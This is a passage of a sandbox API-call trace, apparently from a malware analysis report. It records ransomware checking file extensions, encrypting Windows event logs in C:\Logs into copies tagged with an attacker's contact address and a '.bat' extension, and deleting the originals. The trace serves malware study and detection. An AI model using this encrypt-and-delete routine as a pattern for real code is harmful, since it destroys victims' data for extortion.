(lpString=".ppt") returned 4 [0065.835] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0065.835] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx") returned 57 [0065.835] lstrlenW (lpString=".zip") returned 4 [0065.835] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0065.835] lstrlenW (lpString=".rar") returned 4 [0065.835] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0065.835] lstrlenW (lpString=".bz2") returned 4 [0065.835] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0065.835] lstrlenW (lpString=".7z") returned 3 [0065.835] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0065.835] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx") returned 57 [0065.835] lstrlenW (lpString=".dbf") returned 4 [0065.835] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0065.835] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx") returned 57 [0065.835] lstrlenW (lpString=".1cd") returned 4 [0065.835] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0065.835] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx") returned 57 [0065.835] lstrlenW (lpString=".jpg") returned 4 [0065.835] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0065.836] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0065.836] lstrlenW (lpString="Microsoft-Windows-Kernel-PnP%4Configuration.evtx") returned 48 [0065.836] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-pnp%4configuration.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0065.836] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x30cff14 | out: lpFileSize=0x30cff14*=1052672) returned 1 [0065.836] CloseHandle (hObject=0x39c) returned 1 [0065.836] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-pnp%4configuration.evtx")) returned 0x20 [0065.836] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-kernel-pnp%4configuration.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0065.836] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-pnp%4configuration.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0065.837] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0065.837] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0065.837] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-kernel-pnp%4configuration.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0065.837] GetLastError () returned 0x0 [0065.837] ReadFile (in: hFile=0x39c, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0xffff0, lpOverlapped=0x0) returned 1 [0066.182] WriteFile (in: hFile=0x37c, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0xffff0, lpOverlapped=0x0) returned 1 [0066.198] ReadFile (in: hFile=0x39c, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x1010, lpOverlapped=0x0) returned 1 [0067.250] WriteFile (in: hFile=0x37c, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x1020, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x1020, lpOverlapped=0x0) returned 1 [0068.478] ReadFile (in: hFile=0x39c, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x0, lpOverlapped=0x0) returned 1 [0068.478] WriteFile (in: hFile=0x37c, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x134, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x134, lpOverlapped=0x0) returned 1 [0068.478] SetEndOfFile (hFile=0x37c) returned 1 [0068.478] CloseHandle (hObject=0x37c) returned 1 [0068.478] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0068.478] SetEndOfFile (hFile=0x39c) returned 1 [0068.479] CloseHandle (hObject=0x39c) returned 1 [0068.479] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0068.479] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-pnp%4configuration.evtx")) returned 1 [0068.480] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx") returned 56 [0068.480] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx") returned 56 [0068.480] lstrlenW (lpString=".doc") returned 4 [0068.480] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0068.480] lstrlenW (lpString=".docx") returned 5 [0068.480] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0068.480] lstrlenW (lpString=".pdf") returned 4 [0068.480] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0068.480] lstrlenW (lpString=".xls") returned 4 [0068.480] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0068.480] lstrlenW (lpString=".xlsx") returned 5 [0068.480] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0068.480] lstrlenW (lpString=".ppt") returned 4 [0068.480] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0068.480] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx") returned 56 [0068.480] lstrlenW (lpString=".zip") returned 4 [0068.480] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0068.480] lstrlenW (lpString=".rar") returned 4 [0068.480] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0068.480] lstrlenW (lpString=".bz2") returned 4 [0068.480] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0068.480] lstrlenW (lpString=".7z") returned 3 [0068.480] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0068.480] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx") returned 56 [0068.480] lstrlenW (lpString=".dbf") returned 4 [0068.480] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0068.480] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx") returned 56 [0068.480] lstrlenW (lpString=".1cd") returned 4 [0068.480] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0068.480] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx") returned 56 [0068.481] lstrlenW (lpString=".jpg") returned 4 [0068.481] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0068.481] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx") returned 56 [0068.481] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx") returned 56 [0068.481] lstrlenW (lpString=".doc") returned 4 [0068.481] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0068.481] lstrlenW (lpString=".docx") returned 5 [0068.481] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0068.481] lstrlenW (lpString=".pdf") returned 4 [0068.481] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0068.481] lstrlenW (lpString=".xls") returned 4 [0068.481] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0068.481] lstrlenW (lpString=".xlsx") returned 5 [0068.481] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0068.481] lstrlenW (lpString=".ppt") returned 4 [0068.481] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0068.481] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx") returned 56 [0068.481] lstrlenW (lpString=".zip") returned 4 [0068.481] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0068.481] lstrlenW (lpString=".rar") returned 4 [0068.481] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0068.481] lstrlenW (lpString=".bz2") returned 4 [0068.481] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0068.481] lstrlenW (lpString=".7z") returned 3 [0068.481] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0068.481] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx") returned 56 [0068.481] lstrlenW (lpString=".dbf") returned 4 [0068.481] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0068.481] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx") returned 56 [0068.481] lstrlenW (lpString=".1cd") returned 4 [0068.481] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0068.481] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx") returned 56 [0068.481] lstrlenW (lpString=".jpg") returned 4 [0068.481] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0068.482] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0068.484] lstrlenW (lpString="Microsoft-Windows-SMBServer%4Audit.evtx") returned 39 [0068.484] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4audit.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0068.485] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x30cff14 | out: lpFileSize=0x30cff14*=69632) returned 1 [0068.485] CloseHandle (hObject=0x39c) returned 1 [0068.485] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4audit.evtx")) returned 0x20 [0068.485] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-smbserver%4audit.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0068.485] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4audit.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0068.485] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0068.485] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0068.485] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-smbserver%4audit.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0068.486] GetLastError () returned 0x0 [0068.486] ReadFile (in: hFile=0x39c, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x11000, lpOverlapped=0x0) returned 1 [0068.488] WriteFile (in: hFile=0x37c, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x11010, lpOverlapped=0x0) returned 1 [0068.489] ReadFile (in: hFile=0x39c, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x0, lpOverlapped=0x0) returned 1 [0068.489] WriteFile (in: hFile=0x37c, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x122, lpOverlapped=0x0) returned 1 [0068.489] SetEndOfFile (hFile=0x37c) returned 1 [0068.489] CloseHandle (hObject=0x37c) returned 1 [0068.489] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0068.490] SetEndOfFile (hFile=0x39c) returned 1 [0068.491] CloseHandle (hObject=0x39c) returned 1 [0068.491] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0068.491] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4audit.evtx")) returned 1 [0068.491] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx") returned 47 [0068.491] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx") returned 47 [0068.491] lstrlenW (lpString=".doc") returned 4 [0068.491] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0068.491] lstrlenW (lpString=".docx") returned 5 [0068.491] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0068.491] lstrlenW (lpString=".pdf") returned 4 [0068.491] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0068.491] lstrlenW (lpString=".xls") returned 4 [0068.491] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0068.491] lstrlenW (lpString=".xlsx") returned 5 [0068.491] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0068.491] lstrlenW (lpString=".ppt") returned 4 [0068.491] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0068.491] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx") returned 47 [0068.491] lstrlenW (lpString=".zip") returned 4 [0068.491] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0068.491] lstrlenW (lpString=".rar") returned 4 [0068.491] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0068.491] lstrlenW (lpString=".bz2") returned 4 [0068.491] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0068.492] lstrlenW (lpString=".7z") returned 3 [0068.492] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0068.492] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx") returned 47 [0068.492] lstrlenW (lpString=".dbf") returned 4 [0068.492] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0068.492] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx") returned 47 [0068.492] lstrlenW (lpString=".1cd") returned 4 [0068.492] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0068.492] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx") returned 47 [0068.492] lstrlenW (lpString=".jpg") returned 4 [0068.492] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0068.492] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx") returned 47 [0068.492] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx") returned 47 [0068.492] lstrlenW (lpString=".doc") returned 4 [0068.492] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0068.492] lstrlenW (lpString=".docx") returned 5 [0068.492] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0068.492] lstrlenW (lpString=".pdf") returned 4 [0068.492] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0068.492] lstrlenW (lpString=".xls") returned 4 [0068.492] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0068.492] lstrlenW (lpString=".xlsx") returned 5 [0068.492] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0068.492] lstrlenW (lpString=".ppt") returned 4 [0068.492] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0068.492] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx") returned 47 [0068.492] lstrlenW (lpString=".zip") returned 4 [0068.492] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0068.492] lstrlenW (lpString=".rar") returned 4 [0068.492] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0068.492] lstrlenW (lpString=".bz2") returned 4 [0068.492] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0068.492] lstrlenW (lpString=".7z") returned 3 [0068.492] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0068.492] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx") returned 47 [0068.493] lstrlenW (lpString=".dbf") returned 4 [0068.493] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0068.493] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx") returned 47 [0068.493] lstrlenW (lpString=".1cd") returned 4 [0068.493] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0068.493] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx") returned 47 [0068.493] lstrlenW (lpString=".jpg") returned 4 [0068.493] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0068.493] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0068.493] lstrlenW (lpString="Microsoft-Windows-SMBServer%4Connectivity.evtx") returned 46 [0068.493] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4connectivity.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0068.493] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x30cff14 | out: lpFileSize=0x30cff14*=69632) returned 1 [0068.493] CloseHandle (hObject=0x39c) returned 1 [0068.493] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4connectivity.evtx")) returned 0x20 [0068.493] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-smbserver%4connectivity.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0068.493] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4connectivity.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0068.494] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0068.494] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0068.494] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-smbserver%4connectivity.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0068.494] GetLastError () returned 0x0 [0068.494] ReadFile (in: hFile=0x39c, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x11000, lpOverlapped=0x0) returned 1 [0068.496] WriteFile (in: hFile=0x37c, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x11010, lpOverlapped=0x0) returned 1 [0068.498] ReadFile (in: hFile=0x39c, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x0, lpOverlapped=0x0) returned 1 [0068.498] WriteFile (in: hFile=0x37c, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x130, lpOverlapped=0x0) returned 1 [0068.498] SetEndOfFile (hFile=0x37c) returned 1 [0068.498] CloseHandle (hObject=0x37c) returned 1 [0068.498] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0068.498] SetEndOfFile (hFile=0x39c) returned 1 [0068.500] CloseHandle (hObject=0x39c) returned 1 [0068.500] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0068.500] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4connectivity.evtx")) returned 1 [0068.500] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx") returned 54 [0068.500] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx") returned 54 [0068.500] lstrlenW (lpString=".doc") returned 4 [0068.500] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0068.500] lstrlenW (lpString=".docx") returned 5 [0068.500] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0068.500] lstrlenW (lpString=".pdf") returned 4 [0068.500] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0068.500] lstrlenW (lpString=".xls") returned 4 [0068.500] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0068.500] lstrlenW (lpString=".xlsx") returned 5 [0068.501] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0068.501] lstrlenW (lpString=".ppt") returned 4 [0068.501] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0068.501] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx") returned 54 [0068.501] lstrlenW (lpString=".zip") returned 4 [0068.501] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0068.501] lstrlenW (lpString=".rar") returned 4 [0068.501] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0068.501] lstrlenW (lpString=".bz2") returned 4 [0068.501] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0068.501] lstrlenW (lpString=".7z") returned 3 [0068.501] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0068.501] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx") returned 54 [0068.501] lstrlenW (lpString=".dbf") returned 4 [0068.501] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0068.501] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx") returned 54 [0068.501] lstrlenW (lpString=".1cd") returned 4 [0068.501] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0068.501] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx") returned 54 [0068.501] lstrlenW (lpString=".jpg") returned 4 [0068.501] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0068.501] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx") returned 54 [0068.501] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx") returned 54 [0068.501] lstrlenW (lpString=".doc") returned 4 [0068.501] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0068.501] lstrlenW (lpString=".docx") returned 5 [0068.501] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0068.501] lstrlenW (lpString=".pdf") returned 4 [0068.501] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0068.501] lstrlenW (lpString=".xls") returned 4 [0068.502] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0068.502] lstrlenW (lpString=".xlsx") returned 5 [0068.502] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0068.502] lstrlenW (lpString=".ppt") returned 4 [0068.502] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0068.502] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx") returned 54 [0068.502] lstrlenW (lpString=".zip") returned 4 [0068.502] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0068.502] lstrlenW (lpString=".rar") returned 4 [0068.502] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0068.502] lstrlenW (lpString=".bz2") returned 4 [0068.502] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0068.502] lstrlenW (lpString=".7z") returned 3 [0068.502] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0068.502] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx") returned 54 [0068.502] lstrlenW (lpString=".dbf") returned 4 [0068.502] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0068.502] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx") returned 54 [0068.502] lstrlenW (lpString=".1cd") returned 4 [0068.502] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0068.502] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx") returned 54 [0068.502] lstrlenW (lpString=".jpg") returned 